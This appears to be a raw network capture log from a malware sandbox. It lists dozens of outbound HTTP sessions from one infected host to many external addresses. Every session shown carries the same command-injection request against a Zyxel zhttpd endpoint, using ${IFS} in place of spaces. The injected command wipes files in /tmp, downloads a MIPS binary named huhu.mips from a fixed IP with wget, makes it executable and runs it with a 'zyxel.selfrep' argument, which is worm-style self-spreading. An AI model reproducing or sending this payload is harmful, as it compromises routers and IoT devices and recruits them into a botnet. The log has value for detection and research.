                                              Jan 29, 2024 07:03:37.774539948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1474192.168.2.1455344108.137.131.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774559021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1475192.168.2.145677832.238.130.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774616957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1476192.168.2.1443116147.20.81.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774648905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1477192.168.2.145868818.52.223.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774699926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1478192.168.2.143753298.57.101.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774724007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1479192.168.2.143950876.221.235.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774755955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1480192.168.2.145614699.118.229.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774791956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1481192.168.2.1453740198.197.240.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774827957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1482192.168.2.1450288128.78.203.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774876118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1483192.168.2.145514437.98.199.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774923086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1484192.168.2.1455412187.160.207.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774961948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1485192.168.2.1456070220.163.93.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774996996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1486192.168.2.14531601.97.177.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.775052071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1487192.168.2.1453492176.166.33.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.778522968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1488192.168.2.1435558149.166.99.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.778563976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1489192.168.2.1447768128.55.132.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.778587103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1490192.168.2.1459562156.106.159.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.778652906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1491192.168.2.143808645.102.60.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.778666019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1492192.168.2.1453492222.231.129.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.778697014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1493192.168.2.1435704209.29.243.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787261009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1494192.168.2.1460260177.0.96.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787298918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1495192.168.2.1445812206.218.71.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787353992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1496192.168.2.1455228116.66.254.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787395954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1497192.168.2.1444058129.130.147.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787432909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1498192.168.2.1437422147.130.47.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787477970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1499192.168.2.1438586198.164.58.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787503958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1500192.168.2.144548814.242.119.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787533998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1501192.168.2.1454218200.192.115.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787576914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1502192.168.2.143441680.163.229.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787642002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1503192.168.2.1435644221.204.98.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787682056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1504192.168.2.1443802196.210.238.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787718058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1505192.168.2.143810224.204.17.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787750959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1506192.168.2.1457814189.24.215.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787797928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1507192.168.2.1446644205.163.148.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787820101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1508192.168.2.1456352119.230.167.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787851095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1509192.168.2.1437118154.65.89.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787869930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1510192.168.2.143780034.38.0.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787905931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1511192.168.2.1434188124.146.164.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787939072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1512192.168.2.1456202169.245.181.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.787965059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1513192.168.2.145058088.157.201.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788036108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1514192.168.2.1458438112.185.166.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788090944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1515192.168.2.145191235.230.204.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788114071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1516192.168.2.1437222119.14.5.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788167000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1517192.168.2.1453610143.31.235.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788202047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1518192.168.2.1433980143.229.237.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788242102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1519192.168.2.1444884122.219.238.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788269997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1520192.168.2.1451642169.53.126.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788312912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1521192.168.2.144844885.68.113.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788361073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1522192.168.2.145727434.130.8.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788373947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1523192.168.2.143287452.37.127.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788403988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1524192.168.2.143640498.83.76.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788445950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1525192.168.2.1457212121.140.205.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788472891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1526192.168.2.1440444208.77.33.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788508892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1527192.168.2.1452300211.24.79.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788542032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1528192.168.2.1447484141.244.149.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788573980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1529192.168.2.1450664108.17.61.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788609982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1530192.168.2.1451176119.251.110.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788659096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1531192.168.2.143279049.20.121.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788697004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1532192.168.2.143932867.116.125.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788727045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1533192.168.2.143635890.109.205.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788796902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1534192.168.2.145357838.193.9.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788831949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1535192.168.2.1448666148.96.228.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788862944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1536192.168.2.1434008150.60.136.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788903952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1537192.168.2.1452150150.8.45.32443
                                              TimestampBytes transferredDirectionData
